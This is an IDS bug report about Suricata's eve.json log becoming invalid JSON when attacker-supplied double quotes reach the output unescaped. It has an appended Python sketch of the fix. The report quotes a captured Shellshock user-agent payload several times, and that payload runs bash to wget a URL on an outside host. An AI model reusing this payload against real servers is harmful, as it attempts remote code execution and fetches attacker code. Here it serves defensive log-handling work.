Bug #1299
eve.json JSON output not valid under certain circumstances (e.g. Shellshock)
Status:
Closed
Priority:
Normal
Assignee:
-
Target version:
-
Description
This example comes from recent shellshock attacks.
grep '()' /sdcard/suricata/var/log/suricata/eve.json | sed 's/***\.***\./XXX\.XXX\./g' | while read line; do echo $line | python -m json.tool >> /tmp/test.json || echo $line >> /tmp/invalid.json; done
...
tail -n1 /tmp/invalid.json
{"timestamp":"2014-10-06T19:08:31.121661","event_type":"fileinfo","src_ip":"XXX.XXX.0.94","src_port":80,"dest_ip":"46.165.221.166","dest_port":28220,"proto":"TCP","http":{"url":"/","hostname":"oneiroi.co.uk","http_refer":"<unknown>","http_user_agent":"() { :;}; /bin/bash -c "wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk""},"fileinfo":{"filename":"/","magic":"unknown","state":"CLOSED","stored":false,"size":178}}
The issue here is the http_user_agent, as the UA was sent with an exploit payload:
bin/bash -c "wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk"
This again gets wrapped in double quotes when it is written out to eve.json, so that the JSON is now invalid:
"bin/bash -c "wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk""
...
tail -n1 /tmp/invalid.json | sed 's/-c "/-c \\"/g' | sed 's/""/\\""/g' | python -m json.tool
{
    "dest_ip": "46.165.221.166",
    "dest_port": 28220,
    "event_type": "fileinfo",
    "fileinfo": {
        "filename": "/",
        "magic": "unknown",
        "size": 178,
        "state": "CLOSED",
        "stored": false
    },
    "http": {
        "hostname": "oneiroi.co.uk",
        "http_refer": "<unknown>",
        "http_user_agent": "() { :;}; /bin/bash -c \"wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk\"",
        "url": "/"
    },
    "proto": "TCP",
    "src_ip": "XXX.XXX.0.94",
    "src_port": 80,
    "timestamp": "2014-10-06T19:08:31.121661"
}
TL;DR: the " character must be escaped before a value is written out into eve.json; otherwise attacker-controlled input can produce invalid JSON.
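The following is an added illustration of the defect and its fix, not code from the bug report or from Suricata: a record written by plain string concatenation breaks on a user-agent containing double quotes, while a proper JSON serializer escapes them, and the same line-by-line check the reporter's shell loop performs sorts an eve.json stream into valid and invalid records. The user-agent value and log lines are constructed samples.

```python
import json

# Constructed sample in the shape the report describes: a Shellshock-style
# user-agent whose embedded double quotes break naive serialisation.
SAMPLE_UA = '() { :;}; /bin/bash -c "echo probe"'


def naive_record(user_agent: str) -> str:
    """Reproduces the defect: the value is wrapped in quotes with no escaping."""
    return ('{"event_type":"fileinfo","http":{"http_user_agent":"'
            + user_agent + '"}}')


def escaped_record(user_agent: str) -> str:
    """Correct form: the serializer escapes quotes, backslashes and control chars."""
    record = {"event_type": "fileinfo", "http": {"http_user_agent": user_agent}}
    return json.dumps(record, separators=(",", ":"))


def is_valid_json(line: str) -> bool:
    """Equivalent to piping one line through `python -m json.tool`."""
    try:
        json.loads(line)
        return True
    except ValueError:  # json.JSONDecodeError is a subclass of ValueError
        return False


def split_eve_lines(lines):
    """Sort an eve.json stream into (valid, invalid) lists, like the shell loop."""
    valid, invalid = [], []
    for line in lines:
        (valid if is_valid_json(line) else invalid).append(line)
    return valid, invalid


def recovered_user_agent(line: str) -> str:
    """Parse a valid record and return the user-agent exactly as it was sent."""
    return json.loads(line)["http"]["http_user_agent"]


# Constructed eve.json sample: one benign record, one broken record of the
# kind the report shows, and the correctly escaped version of the same event.
EVE_LINES = [
    '{"event_type":"http","http":{"http_user_agent":"curl/7.37.0"}}',
    naive_record(SAMPLE_UA),
    escaped_record(SAMPLE_UA),
]

if __name__ == "__main__":
    ok, bad = split_eve_lines(EVE_LINES)
    print(f"valid: {len(ok)}  invalid: {len(bad)}")
    for line in bad:
        print("INVALID:", line)
```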